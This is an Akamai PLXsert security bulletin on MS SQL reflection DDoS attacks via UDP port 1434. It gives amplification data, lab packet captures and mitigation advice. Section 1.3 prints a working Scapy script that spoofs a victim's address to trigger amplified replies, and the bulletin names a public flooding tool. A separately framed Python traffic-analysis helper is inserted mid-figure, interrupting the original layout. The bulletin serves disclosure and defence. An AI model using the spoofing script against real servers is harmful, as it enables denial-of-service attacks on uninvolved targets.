
TLP: GREEN
02.11.15
GSI ID: 1086
SECURITY BULLETIN: MS SQL REFLECTION DDOS
RISK FACTOR - MEDIUM

1.1 / OVERVIEW /

Beginning in October 2014, PLXsert observed the use of a new type of reflection-based distributed denial of service (DDoS) attack. This new method of attack manifests in the form of Microsoft SQL Server responses to a client query or request via abuse of the Microsoft SQL Server Resolution Protocol (MC-SQLR), which listens on UDP port 1434. MC-SQLR provides a way for clients to identify the database instance with which they are attempting to communicate when connecting to a database server or cluster with multiple database instances. Each time a client needs to obtain information on the MS SQL servers configured on the network, the SQL Resolution Protocol can be used. The server responds to the client with a list of instances.

One such attack was analyzed by an information security researcher in January 2015. PLXsert confirmed this attack with a publicly available tool. In addition, a weaponized tool that allows automatic execution of the entire attack was found. Attackers abuse Internet-available SQL servers by executing scripted requests and spoofing the source of the query with the IP address of the intended target. The amplification factor varies depending on the number of instances present in the abused SQL server. This new attack vector has been spotted in several DDoS attack campaigns mitigated by Akamai.

1.2 / MALICIOUS PAYLOAD /

This attack presents a specific payload signature, which is shown in Figure 1. This example produced an amplification factor of nearly 25x. In this case, the attacker's request totaled 29 bytes, including IP and UDP headers, and triggered a response of 719 bytes including headers. Some servers may produce a larger or smaller response depending on their configuration.

    19:31:53.778211 IP X.X.X.X.1434 > Z.Z.Z.Z.27960: UDP, length 691
    ...E...{...mG*...m8...ServerName;<redacted>;InstanceName;MSSQLSERVER;IsClustered;no;version;9.00.5000.00;tcp;1433;np;\\<redacted>\pipe\sql\query;via;<redacted>,0:1433;;ServerName;<redacted>;InstanceName;SQL2005ADV;IsClustered;No;Version;9.00.2047.00;tcp;56532;np;\\<redacted>\pipe\MSSQL$SQL2005ADV\sql\query;via;<redacted>,0:1433;;ServerName;<redacted>;instancename;sqlexpress;isclustered;no;version;10.50.2500.0;tcp;52618;np;\\<redacted>\pipe\mssql$sqlexpress\sql\query;via;<redacted>,0:1433;;servername;<redacted>;instancename;sql2012;isclustered;no;version;11.0.3000.0;tcp;65469;np;\\<redacted>\pipe\mssql$sQL2012\sql\query;via;<redacted>,0:1433;;

Figure 1: A UDP response packet payload sent to a target. Target information has been redacted for privacy.

Figure 2 and Figure 3 show network traffic between the spoofed source and the SQL Server instance. The SQL Server responds to a query with the database instances and their network protocol connection information. The queries in Figure 2 are 1-byte payloads that result in 137-byte response payloads. This achieves both reflection and amplification of the response to the original request. The amplification may be larger if the targeted SQL server has multiple instances, because the server will respond with information on all configured instances. The potential amplification factor drives attackers to seek and probe for clustered SQL server hosts, which are usually present at Internet service providers (ISPs), hosting providers and Software-as-a-Service (SaaS) providers. The figures show the attack traffic and responses to a spoofed source, querying a single SQL Server Express instance.

    // 192.168.1.101 spoofing request from .108
    12:39:07.751261 IP 192.168.1.108.80 > 192.168.1.103.1434: UDP, length 1
    // reflected reply
    12:39:07.853641 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137
    E...:...{Q...g...m...P..]...ServerName;TARGET1;InstanceName;SQLEXPRESS;IsClustered;No;
    12:39:11.744710 IP 192.168.1.108.80 > 192.168.1.103.1434: UDP, length 1
    12:39:11.847152 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137
    E...:...{P...g...m...P..]...ServerName;TARGET1;InstanceName;SQLEXPRESS;IsClustered;No;
    12:39:32.326767 IP 192.168.1.108.80 > 192.168.1.103.1434: UDP, length 1
    12:39:32.455674 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137

Figure 2: Traffic capture of the attack reproduced in the lab, as seen by the reflector
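The response format in Figure 1 and the reflected traffic in Figures 2 and 3 can be turned into a small analysis helper for a responder who has to size an incoming flood or inventory what an exposed server advertises. The Python below is an added example, not PLXsert's code or part of the advisory: the response body and capture lines are constructed to mirror the figures, the parser assumes it is handed the ASCII body of the server response, and the amplification math assumes an IPv4 header without options (28 bytes of IP plus UDP headers), which reproduces the 29-byte and 719-byte figures quoted above.

```python
import re

IP_UDP_HEADERS = 28   # 20-byte IPv4 header + 8-byte UDP header (assumes no IP options)
REQUEST_PAYLOAD = 1   # the MC-SQLR client request is a single byte (0x02 or 0x03)

# Constructed sample response body in the Figure 1 format; names and ports are made up.
SAMPLE_RESPONSE = (
    "ServerName;DBHOST01;InstanceName;MSSQLSERVER;IsClustered;No;Version;9.00.5000.00;"
    "tcp;1433;np;\\\\DBHOST01\\pipe\\sql\\query;;"
    "servername;DBHOST01;instancename;sqlexpress;isclustered;no;version;10.50.2500.0;"
    "tcp;52618;np;\\\\DBHOST01\\pipe\\mssql$sqlexpress\\sql\\query;;"
)

# Constructed tcpdump-style lines modelled on Figure 3 (what the spoofed target sees).
SAMPLE_CAPTURE = """\
12:34:26.107469 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137
12:34:29.600969 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137
12:34:30.000001 IP 192.168.1.50.53 > 192.168.1.108.40001: UDP, length 80
12:34:32.687004 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137
"""

def parse_mc_sqlr_response(body: str) -> list:
    """Split the ASCII body of an MC-SQLR server response into one dict per instance.
    Records end with ';;' and hold ';'-separated key/value pairs; keys are lower-cased
    because the captures on the page mix 'ServerName' and 'servername'."""
    instances = []
    for record in body.split(";;"):
        if not record:
            continue
        fields = record.split(";")
        instances.append({fields[i].lower(): fields[i + 1]
                          for i in range(0, len(fields) - 1, 2)})
    return instances

def amplification_factor(response_payload, request_payload=REQUEST_PAYLOAD):
    """Bytes-on-the-wire ratio, counting IP and UDP headers on both sides."""
    return (response_payload + IP_UDP_HEADERS) / (request_payload + IP_UDP_HEADERS)

LINE_RE = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): UDP, length (\d+)")

def reflected_sqlr_bytes(capture: str) -> dict:
    """Sum the UDP payload bytes arriving from source port 1434, per reflector IP.
    Unsolicited traffic from that port is the on-the-wire signature of this attack."""
    totals = {}
    for line in capture.splitlines():
        m = LINE_RE.search(line)
        if m and m.group(2) == "1434":
            totals[m.group(1)] = totals.get(m.group(1), 0) + int(m.group(5))
    return totals
```

Feeding the target-side capture to reflected_sqlr_bytes gives a per-reflector byte count that can be used to rank which sources to ask upstream providers to filter first.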

    12:34:26.107469 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137
    12:34:29.600969 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137
    12:34:32.687004 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137

Figure 3: Traffic capture of the attack reproduced in the lab, as seen by the target

1.3 / ATTACK TOOLS /

PLXsert replicated this attack by creating a script based on Scapy, an open-source packet manipulation tool. The script is shown in Figure 4.

    #!/usr/bin/python2
    import sys
    from scapy.all import *

    target = sys.argv[1].split(":")
    target_ip = target[0]          # victim ip
    target_port = target[1]        # victim port
    reflector_ip = sys.argv[2]     # vulnerable reflector
    query = '03'.decode('hex')     # send query (x02 also works)
    # build the packet
    pkt = IP(src=target_ip, dst=reflector_ip)/UDP(dport=1434, sport=int(target_port))/query
    send(pkt)

Figure 4: PLXsert used a packet manipulation tool to replicate the attack in a lab environment

Other tools publicly available on the Internet could reproduce this attack as well. Replicating this attack does not require a high level of technical skill. A scripted attack would only require a list of SQL servers exposed on the Internet that respond to the query. Attackers could use a unicast client request (0x03) or a broadcast request (0x02). Both are requests with a data length of 1 byte that produce the same type of response from SQL servers. PLXsert identified a tool on GitHub on January 26, 2015, that weaponizes this type of attack for mass abuse. Figure 5 shows a screenshot of the GitHub page for the project named mssqldos.

Figure 5: The GitHub page for the mssqldos tool

The mssqldos tool automates the spoofing of sources and the querying of targeted servers for abuse. The responses are reflected back to the intended target. The tool simplifies the attack and increases its speed by offering simple list processing of vulnerable reflectors and multi-threaded packet flooding.

1.4 / RECOMMENDED MITIGATION /

Server hardening procedures should always be applied to servers that are exposed to the Internet. As a general rule, services and protocols that are unnecessary should be disabled or blocked. This attack can only be performed by querying SQL servers that expose SQL Server Resolution Protocol ports to the Internet. The following best practices can help mitigate this type of DDoS attack. These recommendations are by no means exhaustive, and affected organizations should refine and adapt them further based on their specific infrastructure and exposed services.

- Microsoft Technet: Security Best Practices to Protect Internet Facing Web Servers.
- The use of ingress and egress filters applied to SQL server ports at firewalls, routers, or edge devices may prevent this attack. If there is a business case for keeping UDP 1434 open, it should be filtered to allow only trusted IP addresses.

- Block inbound connections from the Internet if the ports are not needed for external access or administration.
- The SQL Server Resolution Protocol service is not needed on servers that have only one database instance. It has been disabled by default since Microsoft SQL Server 2008, but it is not disabled in earlier or desktop engine versions. Disable this service to prevent the abuse of the SQL server for this type of attack.
- If the SQL Server Resolution Protocol service is needed, add an additional layer of security before the service can be accessed, such as authentication via secure methods (SSH, VPN) or filtering as described above.

1.5 / DDOS MITIGATION /

PLXsert recommends the use of upstream filtering to mitigate the UDP traffic generated by this DDoS attack and so protect the servers being targeted with the reflected, amplified traffic.

The Prolexic Security Engineering and Research Team (PLXsert) monitors malicious cyber threats globally and analyzes these attacks using proprietary techniques and equipment. Through research, digital forensics and post-event analysis, PLXsert is able to build a global view of security threats, vulnerabilities and trends, which is shared with customers and the security community. By identifying the sources and associated attributes of individual attacks, along with best practices to identify and mitigate security threats and vulnerabilities, PLXsert helps organizations make more informed, proactive decisions.

Akamai is a leading provider of cloud services for delivering, optimizing and securing online content and business applications. At the core of the company's solutions is the Akamai Intelligent Platform, providing extensive reach coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly mobile world, supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a hyperconnected world, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.

Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 40 offices around the world. Our services and renowned customer care enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on www.akamai.com/locations

2015 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as of its publication date; such information is subject to change without notice. Published 02/15.